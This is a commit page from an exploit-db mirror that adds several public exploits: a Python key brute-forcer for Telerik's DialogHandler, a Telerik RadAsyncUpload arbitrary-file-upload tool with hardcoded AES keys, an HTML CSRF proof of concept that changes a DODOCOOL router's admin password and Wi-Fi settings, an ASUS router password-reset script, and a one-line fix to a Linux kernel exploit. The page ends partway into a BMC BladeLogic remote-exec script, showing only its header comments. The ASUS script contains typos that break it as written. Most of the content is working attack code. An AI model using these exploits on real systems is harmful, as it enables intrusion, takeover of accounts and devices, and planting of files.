bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-27

Browse source 
9 changes to exploits/shellcodes

RAVPower 2.000.056 - Memory Disclosure

Acunetix WVS 10 - Local Privilege Escalation

NoMachine 5.3.9 - Local Privilege Escalation

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)

Acunetix WVS 10 - Remote Command Execution

Exodus Wallet (ElectronJS Framework) - Remote Code Execution

BMC BladeLogic 8.3.00.64 - Remote Command Execution

Vodafone Mobile Wifi - Reset Admin Password

Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution

ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password
Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure
Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload

Dodocool DC38 N300 - Cross-site Request Forgery

WordPress Plugin Learning Management System - 'course_id' SQL Injection

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
This commit is contained in:
Offensive Security 2018-01-27 05:01:58 +00:00
parent 1b85cfaece
commit bd1b51b595
11 changed files with 1059 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

376
exploits/aspx/webapps/43873.py Executable file
View file

@ -0,0 +1,376 @@
# Exploit Title: Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker
# Filename: dp_crypto.py
# Github: https://github.com/bao7uo/dp_crypto
# Date: 2018-01-23
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Version: Telerik UI for ASP.NET AJAX
# CVE: CVE-2017-9248
# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness
# Tested on: Working on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45)
#!/usr/bin/python3
# Author: Paul Taylor / Foregenix Ltd
# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py
# dp_crypto - CVE-2017-9248 exploit
# Telerik.Web.UI.dll Cryptographic compromise
# Warning - no cert warnings,
# and verify = False in code below prevents verification
import sys
import base64
import requests
import re
import binascii
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests_sent = 0
char_requests = 0
def get_result(plaintext, key, session, pad_chars):
global requests_sent, char_requests
url = sys.argv[2]
base_pad = (len(key) % 4)
base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]
dp_encrypted = base64.b64encode(
(encrypt(plaintext, key) + base).encode()
).decode()
request = requests.Request('GET', url + '?dp=' + dp_encrypted)
request = request.prepare()
response = session.send(request, verify=False)
requests_sent += 1
char_requests += 1
match = re.search("(Error Message:)(.+\n*.+)(</div>)", response.text)
return True \
if match is not None \
and match.group(2) == "Index was outside the bounds of the array." \
else False
def test_keychar(keychar, found, session, pad_chars):
base64chars = [
"A", "Q", "g", "w", "B", "R", "h", "x", "C", "S", "i", "y",
"D", "T", "j", "z", "E", "U", "k", "0", "F", "V", "l", "1",
"G", "W", "m", "2", "H", "X", "n", "3", "I", "Y", "o", "4",
"J", "Z", "p", "5", "K", "a", "q", "6", "L", "b", "r", "7",
"M", "c", "s", "8", "N", "d", "t", "9", "O", "e", "u", "+",
"P", "f", "v", "/"
]
duff = False
accuracy_thoroughness_threshold = sys.argv[5]
for bc in range(int(accuracy_thoroughness_threshold)):
# ^^ max is len(base64chars)
sys.stdout.write("\b\b" + base64chars[bc] + "]")
sys.stdout.flush()
if not get_result(
base64chars[0] * len(found) + base64chars[bc],
found + keychar, session, pad_chars
):
duff = True
break
return False if duff else True
def encrypt(dpdata, key):
encrypted = []
k = 0
for i in range(len(dpdata)):
encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))
k = 0 if k >= len(key) - 1 else k + 1
return ''.join(str(e) for e in encrypted)
def mode_decrypt():
ciphertext = base64.b64decode(sys.argv[2].encode()).decode()
key = sys.argv[3]
print(base64.b64decode(encrypt(ciphertext, key)).decode())
print("")
def mode_encrypt():
plaintext = sys.argv[2]
key = sys.argv[3]
plaintext = base64.b64encode(plaintext.encode()).decode()
print(base64.b64encode(encrypt(plaintext, key).encode()).decode())
print("")
def test_keypos(key_charset, unprintable, found, session):
pad_chars = ''
for pad_char in range(256):
pad_chars += chr(pad_char)
for i in range(len(pad_chars)):
for k in range(len(key_charset)):
keychar = key_charset[k]
sys.stdout.write("\b"*6)
sys.stdout.write(
(
keychar
if unprintable is False
else '+'
) +
") [" + (
keychar
if unprintable is False
else '+'
) +
"]"
)
sys.stdout.flush()
if test_keychar(keychar, found, session, pad_chars[i] * 3):
return keychar
return False
def get_key(session):
global char_requests
found = ''
unprintable = False
key_length = sys.argv[3]
key_charset = sys.argv[4]
if key_charset == 'all':
unprintable = True
key_charset = ''
for i in range(256):
key_charset += chr(i)
else:
if key_charset == 'hex':
key_charset = '01234567890ABCDEF'
print("Attacking " + sys.argv[2])
print(
"to find key of length [" +
str(key_length) +
"] with accuracy threshold [" +
sys.argv[5] +
"]"
)
print(
"using key charset [" +
(
key_charset
if unprintable is False
else '- all ASCII -'
) +
"]\n"
)
for i in range(int(key_length)):
pos_str = (
str(i + 1)
if i > 8
else "0" + str(i + 1)
)
sys.stdout.write("Key position " + pos_str + ": (------")
sys.stdout.flush()
keychar = test_keypos(key_charset, unprintable, found, session)
if keychar is not False:
found = found + keychar
sys.stdout.write(
"\b"*7 + "{" +
(
keychar
if unprintable is False
else '0x' + binascii.hexlify(keychar.encode()).decode()
) +
"} found with " +
str(char_requests) +
" requests, total so far: " +
str(requests_sent) +
"\n"
)
sys.stdout.flush()
char_requests = 0
else:
sys.stdout.write("\b"*7 + "Not found, quitting\n")
sys.stdout.flush()
break
if keychar is not False:
print("Found key: " +
(
found
if unprintable is False
else "(hex) " + binascii.hexlify(found.encode()).decode()
)
)
print("Total web requests: " + str(requests_sent))
return found
def mode_brutekey():
session = requests.Session()
found = get_key(session)
if found == '':
return
else:
urls = {}
url_path = sys.argv[2]
params = (
'?DialogName=DocumentManager' +
'&renderMode=2' +
'&Skin=Default' +
'&Title=Document%20Manager' +
'&dpptn=' +
'&isRtl=false' +
'&dp='
)
versions = [
'2007.1423', '2007.1521', '2007.1626', '2007.2918',
'2007.21010', '2007.21107', '2007.31218', '2007.31314',
'2007.31425', '2008.1415', '2008.1515', '2008.1619',
'2008.2723', '2008.2826', '2008.21001', '2008.31105',
'2008.31125', '2008.31314', '2009.1311', '2009.1402',
'2009.1527', '2009.2701', '2009.2826', '2009.31103',
'2009.31208', '2009.31314', '2010.1309', '2010.1415',
'2010.1519', '2010.2713', '2010.2826', '2010.2929',
'2010.31109', '2010.31215', '2010.31317', '2011.1315',
'2011.1413', '2011.1519', '2011.2712', '2011.2915',
'2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',
'2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',
'2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',
'2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',
'2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',
'2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',
'2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',
'2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',
'2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',
'2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',
'2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',
'2017.3.913'
]
plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'
plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='
plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
plaintext3 = ';AllowMultipleSelection,False,3,False'
for version in versions:
plaintext2_raw2 = version
plaintext2 = base64.b64encode(
(plaintext2_raw1 +
plaintext2_raw2 +
plaintext2_raw3
).encode()
).decode()
plaintext = plaintext1 + plaintext2 + plaintext3
plaintext = base64.b64encode(
plaintext.encode()
).decode()
ciphertext = base64.b64encode(
encrypt(
plaintext,
found
).encode()
).decode()
full_url = url_path + params + ciphertext
urls[version] = full_url
found_valid_version = False
for version in urls:
url = urls[version]
request = requests.Request('GET', url)
request = request.prepare()
response = session.send(request, verify=False)
if response.status_code == 500:
continue
else:
match = re.search(
"(Error Message:)(.+\n*.+)(</div>)",
response.text
)
if match is None:
print(version + ": " + url)
found_valid_version = True
break
if not found_valid_version:
print("No valid version found")
def mode_samples():
print("Samples for testing decryption and encryption functions:")
print("-d ciphertext key")
print("-e plaintext key")
print("")
print("Key:")
print("DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D")
print("")
print("Plaintext:")
print("EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False")
print("")
print("Ciphertext:")
print("FhQAWBwoPl9maHYCJlx8YlZwQDAdYxRBYlgDNSJxFzZ9PUEWVlhgXHhxFipXdWR0HhV3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMLciMVMnN9AFJ0Z2EDWG4sPCpnZQMtHhRnWx8SFHBuaHZbEQJgAVdwbjwlcxNeVHY9ARgUOj9qF045eXBkSVMWEXFgX2QxHgRjSRESf1htY0BwHWZKTm9kTz8IcAwFZm0HNSNxBC5lA39zVH57Q2EJDndvYUUzCAVFRBw/KmJiZwAOCwB8WGxvciwlcgdaVH0XKiIudz98Ams6UWFjQ3oCPBJ4X0EzHXJwCRURMnVVXX5eJnZkcldgcioecxdeanMLNCAUdz98AWMrV354XHsFCTVjenh1HhdBfhwdLmVUd0BBHWZgc1RgQCoRBikEamY9ARgUOj9qF047eXJ/R3kFIzF4dkYJJnF7WCcCKgVuaGpHJgMHZWxvaikIcR9aUn0LKg0HAzZ/dGMzV3Fgc1QsfXVWAGQ9FXEMRSECEEZTdnpOJgJoRG9wbj8SfClFamBwLiMUFzZiKX8wVgRjQ3oCM3FjX14oIHJ3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMDMBEXNg9TdXcxVGEDZVVyEixUcUoDHRRNSh8WMUl7dWJfJnl8WHoHbnIgcxNLUlgDNRMELi1SAwAtVgd0WFMGIzVnX3Q3J3FgQwgGMQRjd35CHgJkXG8FbTUWWQNBUwcQNQwAOiRmPmtzY1psfmcVMBNvZUooJy5ZQgkuFENuZ0BBHgFgWG9aVDMlbBdCUgdxMxMELi1SAwAtY35aR20UcS5XZWc3Fi5zQyZ3E0B6c0BgFgBoTmJbUA0ncwMHfmMtJxdzLnRmKG8xUWB8aGIvBi1nSF5xEARBYyYDKmtSeGJWCXQHBmxaDRUhYwxLVX01CyByCHdnEHcUUXBGaHkVBhNjAmh1ExVRWycCCEFiXnptEgJaBmJZVHUeBR96ZlsLJxYGMjJpHFJyYnBGaGQZEhFjZUY+FxZvUScCCEZjXnpeCVtjAWFgSAQhcXBCfn0pCyAvFHZkL3RzeHMHdFNzIBR4A2g+HgZdZyATNmZ6aG5WE3drQ2wFCQEnBD12YVkDLRdzMj9pEl0MYXBGaVUHEi94XGA3HS5aRyAAd0JlXQltEgBnTmEHagAJX3BqY1gtCAwvBzJ/dH8wV3EPA2MZEjVRdV4zJgRjZB8SPl9uA2pHJgMGR2dafjUnBhBBfUw9ARgUOj9qFQR+")
print("")
def mode_b64e():
print(base64.b64encode(sys.argv[2].encode()).decode())
print("")
def mode_b64d():
print(base64.b64decode(sys.argv[2].encode()).decode())
print("")
def mode_help():
print("Usage:")
print("")
print("Decrypt a ciphertext: -d ciphertext key")
print("Encrypt a plaintext: -e plaintext key")
print("Bruteforce key/generate URL: -k url key_length key_charset accuracy")
print("Encode parameter to base64: -b plain_parameter")
print("Decode base64 parameter: -p encoded_parameter")
print("")
print("To test all ascii characters set key_charset to: all, " +
"for upper case hex (e.g. machine key) set to hex.")
print("")
print("Maximum accuracy is out of 64 where 64 is the most accurate, " +
"accuracy of 9 will usually suffice for a hex, but 21 or more " +
"might be needed when testing all ascii characters.")
print("Increase the accuracy argument if no valid version is found.")
print("")
print("Examples to generate a valid file manager URL:")
print("./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 hex 9")
print("./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 all 21")
print("")
sys.stderr.write(
"\ndp_crypto by Paul Taylor / Foregenix Ltd\nCVE-2017-9248 - " +
"Telerik.Web.UI.dll Cryptographic compromise\n\n"
)
if len(sys.argv) < 2:
mode_help()
elif sys.argv[1] == "-d" and len(sys.argv) == 4:
mode_decrypt()
elif sys.argv[1] == "-e" and len(sys.argv) == 4:
mode_encrypt()
elif sys.argv[1] == "-k" and len(sys.argv) == 6:
mode_brutekey()
elif sys.argv[1] == "-s" and len(sys.argv) == 2:
mode_samples()
elif sys.argv[1] == "-b" and len(sys.argv) == 3:
mode_b64e()
elif sys.argv[1] == "-p" and len(sys.argv) == 3:
mode_b64d()
else:
mode_help()

324
exploits/aspx/webapps/43874.py Executable file
View file

@ -0,0 +1,324 @@
# Exploit Title: Telerik UI for ASP.NET AJAX RadAsyncUpload uploader
# Filename: RAU_crypto.py
# Github: https://github.com/bao7uo/RAU_crypto
# Date: 2018-01-23
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Version: Telerik UI for ASP.NET AJAX
# CVE: CVE-2017-11317, CVE-2017-11357
# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference
# Tested on: Working on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45)
#!/usr/bin/python3
# Author: Paul Taylor / Foregenix Ltd
# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py
# RAU crypto - Exploiting CVE-2017-11317, CVE-2017-11357
# Telerik Web UI for ASP.NET AJAX
# RadAsyncUpload hardcoded keys / insecure direct object reference
# Arbitrary file upload
# Telerik fixed in June 2017 by removing default keys in
# versions R2 2017 SP1 (2017.2.621) and providing the ability to disable the
# RadAsyncUpload feature in R2 2017 SP2 (2017.2.711)
# https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
# https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference
# http://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security
# http://target/Telerik.Web.UI.WebResource.axd?type=rau
import sys
import base64
import json
import re
import requests
from Crypto.Cipher import AES
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
import binascii
# Warning, the below prevents certificate warnings,
# and verify = False in the later code prevents them being verified
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class RAUCipher:
key = binascii.unhexlify("EB8AF90FDE30FECBE330E807CF0B4252" +
"A44E9F06A2EA4AF10B046F598DD3EA0C")
iv = binascii.unhexlify("E330E807CF0B425255A3A561A707D269")
def encrypt(plaintext):
sys.stderr.write("Encrypting... ")
encoded = ""
for i in plaintext:
encoded = encoded + i + "\x00"
plaintext = encoded + (
chr(16 - (len(encoded) % 16)) *
(16 - (len(encoded) % 16))
)
cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
sys.stderr.write("done\n")
return base64.b64encode(cipher.encrypt(plaintext)).decode()
def decrypt(ciphertext):
sys.stderr.write("Decrypting... ")
ciphertext = base64.b64decode(ciphertext)
cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
unpad = lambda s: s[0:-ord(chr(s[-1]))]
sys.stderr.write("done\n")
return unpad(cipher.decrypt(ciphertext[0:])).decode()[0::2]
def addHmac(string, Version):
isHmacVersion = False
# "Encrypt-then-MAC" feature introduced in R1 2017
# Required for "2017.1.118", "2017.1.228", "2017.2.503"
if "2017" in Version:
isHmacVersion = True
hmac = HMAC.new(
b'PrivateKeyForHashOfUploadConfiguration',
bytes(string.encode()),
SHA256.new()
)
hmac = base64.b64encode(hmac.digest()).decode()
return string + hmac if isHmacVersion else string
def rauPostData_prep(quiet, TempTargetFolder, Version):
TargetFolder = RAUCipher.addHmac(
"jgas0meSrU/uP/TPzrhDTw==",
Version
)
TempTargetFolder = RAUCipher.addHmac(
RAUCipher.encrypt(TempTargetFolder),
Version
)
rauJSONplaintext = \
'{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \
TempTargetFolder + \
'","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}'
if not quiet:
print("JSON: " + rauJSONplaintext + "\n")
rauPostData = RAUCipher.encrypt(rauJSONplaintext) + "&"
rauVersionplaintext = \
"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \
Version + \
", Culture=neutral, PublicKeyToken=121fae78165ba3d4"
if not quiet:
print("Version: " + rauVersionplaintext + "\n")
rauPostData += RAUCipher.encrypt(rauVersionplaintext)
return rauPostData
def getVersion(url):
sys.stderr.write("Contacting server... ")
response = requests.get(url, verify=False)
html = response.text
sys.stderr.write("done\n")
match = re.search(
'((?<=\<\!-- )20\d{2}(.\d+)+(?= --\>))|' +
'(?<=Version%3d)20\d{2}(.\d+)+(?=%2c)|' +
'(?<=Version=)20\d{2}(.\d+)+(?=,)',
html
)
if match:
return match.group(0)
else:
return "No version result"
def payload(TempTargetFolder, Version, payload_filename):
sys.stderr.write("file: " + payload_filename + "\n")
sys.stderr.write("version: " + Version + "\n")
sys.stderr.write("destination " + TempTargetFolder + "\n")
sys.stderr.write("Preparing payload... \n")
payload_file = open(payload_filename, "r")
payload_file_data = payload_file.read()
payload_file.close()
quiet = True
data = "-----------------------------68821516528156\r\n"
data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n"
data += "\r\n"
data += rauPostData_prep(quiet, TempTargetFolder, Version) + "\r\n"
data += "-----------------------------68821516528156\r\n"
data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n"
data += "Content-Type: application/octet-stream\r\n"
data += "\r\n"
data += payload_file_data
data += "-----------------------------68821516528156\r\n"
data += "Content-Disposition: form-data; name=\"fileName\"\r\n"
data += "\r\n"
data += "RAU_crypto.bypass\r\n"
data += "-----------------------------68821516528156\r\n"
data += "Content-Disposition: form-data; name=\"contentType\"\r\n"
data += "\r\n"
data += "text/html\r\n"
data += "-----------------------------68821516528156\r\n"
data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n"
data += "\r\n"
data += "2017-06-28T09:11:28.586Z\r\n"
data += "-----------------------------68821516528156\r\n"
data += "Content-Disposition: form-data; name=\"metadata\"\r\n"
data += "\r\n"
data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \
payload_filename + "\"}\r\n"
data += "-----------------------------68821516528156--\r\n"
data += "\r\n"
sys.stderr.write("Payload prep done\n")
return data
def upload(TempTargetFolder, Version, payload_filename, url):
sys.stderr.write("Preparing to upload to " + url + "\n")
session = requests.Session()
request = requests.Request(
'POST',
url,
data=payload(
TempTargetFolder,
Version,
payload_filename
)
)
request = request.prepare()
request.headers["Content-Type"] = \
"multipart/form-data; " +\
"boundary=---------------------------68821516528156"
response = session.send(request, verify=False)
sys.stderr.write("Upload done\n")
return response.text
def decode_rauPostData(rauPostData):
rauPostData = rauPostData.split("&")
rauJSON = RAUCipher.decrypt(rauPostData[0])
decoded = "\nJSON: " + rauJSON + "\n"
TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"]
decoded = decoded + "\nTempTargetFolder = " + \
RAUCipher.decrypt(TempTargetFolder) + "\n"
rauVersion = RAUCipher.decrypt(rauPostData[1])
decoded = decoded + "\nVersion: " + rauVersion + "\n"
return decoded
def mode_decrypt():
# decrypt ciphertext
ciphertext = sys.argv[2]
print("\n" + RAUCipher.decrypt(ciphertext) + "\n")
def mode_Decrypt_rauPostData():
# decrypt rauPostData
rauPostData = sys.argv[2]
print(decode_rauPostData(rauPostData))
def mode_encrypt():
# encrypt plaintext
plaintext = sys.argv[2]
print("\n" + RAUCipher.encrypt(plaintext) + "\n")
def mode_Encrypt_rauPostData():
# encrypt rauPostData based on TempTargetFolder and Version
quiet = False
TempTargetFolder = sys.argv[2]
Version = sys.argv[3]
print(
"rauPostData: " +
rauPostData_prep(quiet, TempTargetFolder, Version) +
"\n"
)
def mode_encrypt_rauPostData_Quiet():
# as per -E but just output encrypted rauPostData,
# not the prepared JSON and version
quiet = True
TempTargetFolder = sys.argv[2]
Version = sys.argv[3]
print(rauPostData_prep(quiet, TempTargetFolder, Version))
def mode_version():
# extract Telerik web ui version details from url
url = sys.argv[2]
print(getVersion(url))
def mode_payload():
# generate a payload based on TempTargetFolder, Version and payload file
TempTargetFolder = sys.argv[2]
Version = sys.argv[3]
payload_filename = sys.argv[4]
print(payload(TempTargetFolder, Version, payload_filename))
def mode_Post():
# generate and upload a payload based on
# TempTargetFolder, Version, payload file and url
TempTargetFolder = sys.argv[2]
Version = sys.argv[3]
payload_filename = sys.argv[4]
url = sys.argv[5]
print(upload(TempTargetFolder, Version, payload_filename, url))
def mode_help():
print(
"Usage:\n" +
"\n" +
"Decrypt a plaintext: -d ciphertext\n" +
"Decrypt rauPostData: -D rauPostData\n" +
"Encrypt a plaintext: -e plaintext\n" +
"Gen rauPostData: -E TempTargetFolder Version\n" +
"Gen rauPostData (quiet): -Q TempTargetFolder Version\n" +
"Version in HTTP response: -v url\n" +
"Generate a POST payload: -p TempTargetFolder Version c:\\\\folder\\\\filename\n" +
"Upload a payload: -P TempTargetFolder Version c:\\\\folder\\\\filename url\n\n"
"Example URL: http://target/Telerik.Web.UI.WebResource.axd?type=rau"
)
sys.stderr.write("\nRAU_crypto by Paul Taylor / Foregenix Ltd.\n")
sys.stderr.write(
"CVE-2017-11317 - " +
"Telerik RadAsyncUpload hardcoded keys / arbitrary file upload\n\n"
)
if len(sys.argv) < 2:
mode_help()
elif sys.argv[1] == "-d" and len(sys.argv) == 3:
mode_decrypt()
elif sys.argv[1] == "-D" and len(sys.argv) == 3:
mode_Decrypt_rauPostData()
elif sys.argv[1] == "-e" and len(sys.argv) == 3:
mode_encrypt()
elif sys.argv[1] == "-E" and len(sys.argv) == 4:
mode_Encrypt_rauPostData()
elif sys.argv[1] == "-Q" and len(sys.argv) == 4:
mode_encrypt_rauPostData_Quiet()
elif sys.argv[1] == "-v" and len(sys.argv) == 3:
mode_version()
elif sys.argv[1] == "-p" and len(sys.argv) == 5:
mode_payload()
elif sys.argv[1] == "-P" and len(sys.argv) == 6:
mode_Post()
else:
mode_help()

75
exploits/hardware/webapps/43898.html Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery
# Date: 17-01-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: DODOCOOL
# Vendor Homepage: www.dodocool.com
# Version: RTN2-AW.GD.R3465.1.20161103
# CVE: CVE-2018-5720
I DESCRIPTION
========================================================================
An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range
Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery
(CSRF) vulnerability allows remote attackers to hijack the authentication
of users for requests that modify the configuration.
This vulnerability may lead to username and/or password changing, Wi-Fi
password changing, etc.
II PROOF OF CONCEPT
========================================================================
## Change user username and password (test_username:test_password):
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.10.1/boafrm/formPasswordSetup"
method="POST">
<input type="hidden" name="submit&#45;url"
value="&#47;setok&#46;htm&#63;bw&#61;main&#46;htm" />
<input type="hidden" name="submit&#45;value" value="" />
<input type="hidden" name="username" value="test&#95;username" />
<input type="hidden" name="newpass" value="test&#95;password" />
<input type="hidden" name="confpass" value="test&#95;password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
## Change WiFi Configuration (WIFI_TEST:TestTest):
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.10.1/boafrm/formWlanSetupREP"
method="POST">
<input type="hidden" name="submit&#45;url"
value="&#47;setok&#46;htm&#63;bw&#61;wl&#95;rep&#46;htm" />
<input type="hidden" name="submit&#45;value" value="repset" />
<input type="hidden" name="wl&#95;onoff" value="0" />
<input type="hidden"
name="wps&#95;clear&#95;configure&#95;by&#95;reg" value="0" />
<input type="hidden" name="wlProfileId" value="" />
<input type="hidden" name="wl&#95;mode" value="0" />
<input type="hidden" name="wl&#95;authType" value="auto" />
<input type="hidden" name="wepEnabled" value="ON" />
<input type="hidden" name="weplength" value="" />
<input type="hidden" name="wepformat" value="" />
<input type="hidden" name="wl&#95;wpaAuth" value="psk" />
<input type="hidden" name="wl&#95;pskFormat" value="0" />
<input type="hidden" name="wl&#95;pskValue" value="TestTest" />
<input type="hidden" name="wl&#95;ssid" value="WIFI_TEST" />
<input type="hidden" name="wl&#95;Method" value="6" />
<input type="hidden" name="wep&#95;key" value="" />
<input type="hidden" name="ciphersuite" value="tkip&#43;aes" />
<input type="hidden" name="ciphersuite" value="aes" />
<input type="hidden" name="wpa2ciphersuite" value="tkip&#43;aes" />
<input type="hidden" name="wpa2ciphersuite" value="aes" />
<input type="hidden" name="web&#95;pskValue" value="TestTest" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

19
exploits/hardware/webapps/43900.py Executable file
View file

@ -0,0 +1,19 @@
import requests
import sys
import urllib3
ip = sys.argv[1]
user = sys.argv[2]
newPassword = sys.argv[3]
#requests.packages.urilib3.disable_warnings()
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
data = {"group_id": '', "action_mode": "apply", "current_page": "Main_Password.asp", "next_page": "index.asp", "flag": '', "usernamepasswdFIag": "1", "http_username": user, "http_passwd": newPassword, "foilautofill": ''}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,'/';q=0.8", "Accept-Language": "en-US,en;q=0.5", "Referer": ip + "/Main_Password.asp", "Content-Type": "application/x-www-form-urIencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
print("-> New password for " + user + " is " + newPassword)
try:
res = requests.post(ip + '/mod__login.asp', headers=headers, data=data, timeout=2, verify=FaIse)
except:
sys.exit(1)

2
exploits/linux/local/43418.c
View file

@ -332,7 +332,7 @@ unsigned long get_kernel_addr() {
strncmp("4.4.0", kernels[kernel].version, 5) == 0)
return get_kernel_addr_trusty(syslog, size);
if (strcmp("xenial", kernels[kernel].distro) == 0 &&
strncmp("4.4.0", kernels[kernel].version, 5) == 0) ||
strncmp("4.4.0", kernels[kernel].version, 5) == 0 ||
strncmp("4.8.0", kernels[kernel].version, 5) == 0)
return get_kernel_addr_xenial(syslog, size);

116
exploits/linux/remote/43902.py Executable file
View file

@ -0,0 +1,116 @@
# Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version
# Filename: BMC_rexec.py
# Github: https://github.com/bao7uo/bmc_bladelogic
# Date: 2018-01-24
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Version: BMC RSCD agent 8.3.00.64
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-critical-security-issue-in-bmc-server-automation-cve-2016-1542-cve-2016-1543
# Tested on: 8.3.00.64
#!/usr/bin/python
# BMC BladeLogic RSCD agent remote exec - XMLRPC version
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# By Paul Taylor / Foregenix Ltd
# Credit: https://github.com/ernw/insinuator-snippets/tree/master/bmc_bladelogic
# Credit: https://github.com/yaolga
# Credit: Nick Bloor for AWS image for testing :-)
